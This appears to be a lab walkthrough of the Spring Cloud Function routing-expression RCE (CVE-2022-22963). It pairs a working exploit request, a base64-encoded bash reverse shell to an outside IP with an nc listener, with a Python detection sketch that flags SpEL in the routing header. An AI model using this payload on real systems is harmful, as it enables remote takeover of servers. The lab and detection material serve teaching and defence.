1. Run the following commands to start the vulnerable lab environment, then open it in a browser
cd spring/CVE-2022-22963
docker-compose up -d
docker ps
2. Reverse shell
Construct the payload
Refresh the page, capture the request, and modify its contents
POST /functionRouter HTTP/1.1
Host: 192.168.0.107:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMjMxLjAvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 8
test
Start the listener, then trigger the reverse shell
nc -lvvp 7777
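From the defender's side, the request above stands out because a client supplies the spring.cloud.function.routing-expression header and its value contains SpEL code. The following detection sketch is an added example, not part of the original walkthrough; the function names, the three verdict labels and the sample requests are assumptions constructed for illustration.

```python
import re

# Header whose value the vulnerable routing function evaluates as SpEL
# (the header abused in the request shown above).
ROUTING_HEADER = "spring.cloud.function.routing-expression"

# SpEL constructs that should never arrive in a client-supplied header:
# T(...) type references, "new" object creation, and method calls.
SUSPICIOUS = re.compile(r"T\s*\(|\bnew\s+[\w.]+\s*\(|\.\s*\w+\s*\(", re.I)

def parse_headers(raw_request):
    """Return (request_line, {lowercased header name: value}) from raw HTTP text."""
    # Only the part before the first blank line is headers; the body is ignored.
    head = re.split(r"\r?\n\r?\n", raw_request, maxsplit=1)[0]
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            # HTTP header names are case-insensitive, so normalise them.
            headers[name.strip().lower()] = value.strip()
    return (lines[0] if lines else ""), headers

def classify(raw_request):
    """'block' if the routing header carries SpEL code, 'review' if a client
    sent the header at all, 'ok' if the header is absent."""
    _, headers = parse_headers(raw_request)
    value = headers.get(ROUTING_HEADER)
    if value is None:
        return "ok"
    return "block" if SUSPICIOUS.search(value) else "review"

# Constructed sample requests (placeholder host and command, not captured traffic).
SAMPLE_SPEL = (
    "POST /functionRouter HTTP/1.1\r\nHost: lab.example:8080\r\n"
    'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("<command>")\r\n'
    "Content-Type: text/plain\r\n\r\ntest"
)
SAMPLE_MIXED_CASE = (
    "POST /functionRouter HTTP/1.1\r\nHost: lab.example:8080\r\n"
    "Spring.Cloud.Function.Routing-Expression: uppercase\r\n\r\ntest"
)
SAMPLE_BODY_ONLY = (
    "POST /functionRouter HTTP/1.1\r\nHost: lab.example:8080\r\n"
    "Content-Type: text/plain\r\n\r\n"
    "spring.cloud.function.routing-expression: T(x)"
)

if __name__ == "__main__":
    for sample in (SAMPLE_SPEL, SAMPLE_MIXED_CASE, SAMPLE_BODY_ONLY):
        print(classify(sample))
```

The same header match can be applied at a reverse proxy or WAF to drop the header before it reaches the application.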